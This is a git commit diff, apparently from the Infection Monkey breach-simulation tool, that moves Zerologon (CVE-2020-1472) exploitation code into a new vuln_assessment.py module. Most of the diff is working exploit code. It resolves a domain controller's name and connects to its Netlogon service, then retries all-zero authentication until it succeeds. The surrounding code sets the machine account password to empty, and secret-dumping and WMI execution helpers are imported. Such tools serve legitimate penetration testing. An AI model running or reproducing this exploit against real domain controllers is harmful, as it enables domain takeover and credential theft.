Add zerologon_utils/vuln_assessment.py

This commit is contained in:
Shreya 2021-02-22 18:18:20 +05:30
parent 4e281d9826
commit defc94dd59
2 changed files with 98 additions and 83 deletions

View File

@ -10,7 +10,6 @@ from binascii import unhexlify
from typing import Dict, List, Optional, Tuple from typing import Dict, List, Optional, Tuple
import impacket import impacket
import nmb.NetBIOS
from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
from impacket.dcerpc.v5.dtypes import NULL from impacket.dcerpc.v5.dtypes import NULL
@ -18,6 +17,8 @@ from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump
from infection_monkey.exploit.zerologon_utils.vuln_assessment import (
get_dc_details, is_exploitable)
from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
from infection_monkey.utils.capture_output import StdoutCapture from infection_monkey.utils.capture_output import StdoutCapture
@ -40,12 +41,10 @@ class ZerologonExploiter(HostExploiter):
self._extracted_creds = {} self._extracted_creds = {}
def _exploit_host(self) -> bool: def _exploit_host(self) -> bool:
self.dc_ip, self.dc_name, self.dc_handle = ZerologonExploiter.get_dc_details( self.dc_ip, self.dc_name, self.dc_handle = get_dc_details(self.host)
self.host
)
is_exploitable, rpc_con = self.is_exploitable() can_exploit, rpc_con = is_exploitable(self)
if is_exploitable: if can_exploit:
LOG.info("Target vulnerable, changing account password to empty string.") LOG.info("Target vulnerable, changing account password to empty string.")
# Start exploiting attempts. # Start exploiting attempts.
@ -72,47 +71,6 @@ class ZerologonExploiter(HostExploiter):
return _exploited return _exploited
@staticmethod
def get_dc_details(host: object) -> (str, str, str):
dc_ip = host.ip_addr
dc_name = ZerologonExploiter.get_dc_name(dc_ip=dc_ip)
dc_handle = "\\\\" + dc_name
return dc_ip, dc_name, dc_handle
@staticmethod
def get_dc_name(dc_ip: str) -> str:
"""
Gets NetBIOS name of the Domain Controller (DC).
"""
try:
nb = nmb.NetBIOS.NetBIOS()
name = nb.queryIPForName(
ip=dc_ip
) # returns either a list of NetBIOS names or None
return name[0] if name else ""
except BaseException as ex:
LOG.info(f"Exception: {ex}")
def is_exploitable(self) -> (bool, object):
# Connect to the DC's Netlogon service.
try:
rpc_con = ZerologonExploiter.connect_to_dc(self.dc_ip)
except Exception as e:
LOG.info(f"Exception occurred while connecting to DC: {str(e)}")
return False, None
# Try authenticating.
for _ in range(0, self.MAX_ATTEMPTS):
try:
rpc_con_auth_result = self._try_zero_authenticate(rpc_con)
if rpc_con_auth_result is not None:
return True, rpc_con_auth_result
except Exception as ex:
LOG.info(ex)
return False, None
return False, None
@staticmethod @staticmethod
def connect_to_dc(dc_ip) -> object: def connect_to_dc(dc_ip) -> object:
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp") binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
@ -121,41 +79,6 @@ class ZerologonExploiter(HostExploiter):
rpc_con.bind(nrpc.MSRPC_UUID_NRPC) rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
return rpc_con return rpc_con
def _try_zero_authenticate(self, rpc_con: rpcrt.DCERPC_v5) -> object:
plaintext = b"\x00" * 8
ciphertext = b"\x00" * 8
flags = 0x212FFFFF
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(
rpc_con, self.dc_handle + "\x00", self.dc_name + "\x00", plaintext
)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con,
self.dc_handle + "\x00",
self.dc_name + "$\x00",
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
self.dc_name + "\x00",
ciphertext,
flags,
)
assert server_auth["ErrorCode"] == 0
return rpc_con
except nrpc.DCERPCSessionError as ex:
if (
ex.get_error_code() == 0xC0000022
): # STATUS_ACCESS_DENIED error; if not this, probably some other issue.
pass
else:
raise Exception(f"Unexpected error code: {ex.get_error_code()}.")
except BaseException as ex:
raise Exception(f"Unexpected error: {ex}.")
def _send_exploit_rpc_login_requests(self, rpc_con) -> bool: def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
for _ in range(0, self.MAX_ATTEMPTS): for _ in range(0, self.MAX_ATTEMPTS):
exploit_attempt_result = self.try_exploit_attempt(rpc_con) exploit_attempt_result = self.try_exploit_attempt(rpc_con)
@ -187,7 +110,7 @@ class ZerologonExploiter(HostExploiter):
return rpc_con.request(request) return rpc_con.request(request)
@staticmethod @staticmethod
def _set_up_request(request: nrps.NetrServerPasswordSet2, dc_name: str) -> None: def _set_up_request(request: nrpc.NetrServerPasswordSet2, dc_name: str) -> None:
authenticator = nrpc.NETLOGON_AUTHENTICATOR() authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator["Credential"] = b"\x00" * 8 authenticator["Credential"] = b"\x00" * 8
authenticator["Timestamp"] = b"\x00" * 4 authenticator["Timestamp"] = b"\x00" * 4

View File

@ -0,0 +1,92 @@
import logging
from typing import Optional
import nmb.NetBIOS
from impacket.dcerpc.v5 import nrpc, rpcrt
LOG = logging.getLogger(__name__)
def get_dc_details(host: object) -> (str, str, str):
dc_ip = host.ip_addr
dc_name = _get_dc_name(dc_ip=dc_ip)
dc_handle = "\\\\" + dc_name
return dc_ip, dc_name, dc_handle
def _get_dc_name(dc_ip: str) -> str:
"""
Gets NetBIOS name of the Domain Controller (DC).
"""
try:
nb = nmb.NetBIOS.NetBIOS()
name = nb.queryIPForName(
ip=dc_ip
) # returns either a list of NetBIOS names or None
return name[0] if name else ""
except BaseException as ex:
LOG.info(f"Exception: {ex}")
def is_exploitable(zerologon_exploiter_object) -> (bool, Optional[rpcrt.DCERPC_v5]):
# Connect to the DC's Netlogon service.
try:
rpc_con = zerologon_exploiter_object.connect_to_dc(zerologon_exploiter_object.dc_ip)
except Exception as e:
LOG.info(f"Exception occurred while connecting to DC: {str(e)}")
return False, None
# Try authenticating.
for _ in range(0, zerologon_exploiter_object.MAX_ATTEMPTS):
try:
rpc_con_auth_result = _try_zero_authenticate(
zerologon_exploiter_object, rpc_con
)
if rpc_con_auth_result is not None:
return True, rpc_con_auth_result
except Exception as ex:
LOG.info(ex)
return False, None
return False, None
def _try_zero_authenticate(
zerologon_exploiter_object, rpc_con: rpcrt.DCERPC_v5
) -> rpcrt.DCERPC_v5:
plaintext = b"\x00" * 8
ciphertext = b"\x00" * 8
flags = 0x212FFFFF
# Send challenge and authentication request.
nrpc.hNetrServerReqChallenge(
rpc_con,
zerologon_exploiter_object.dc_handle + "\x00",
zerologon_exploiter_object.dc_name + "\x00",
plaintext,
)
try:
server_auth = nrpc.hNetrServerAuthenticate3(
rpc_con,
zerologon_exploiter_object.dc_handle + "\x00",
zerologon_exploiter_object.dc_name + "$\x00",
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
zerologon_exploiter_object.dc_name + "\x00",
ciphertext,
flags,
)
assert server_auth["ErrorCode"] == 0
return rpc_con
except nrpc.DCERPCSessionError as ex:
if (
ex.get_error_code() == 0xC0000022
): # STATUS_ACCESS_DENIED error; if not this, probably some other issue.
pass
else:
raise Exception(f"Unexpected error code: {ex.get_error_code()}.")
except BaseException as ex:
raise Exception(f"Unexpected error: {ex}.")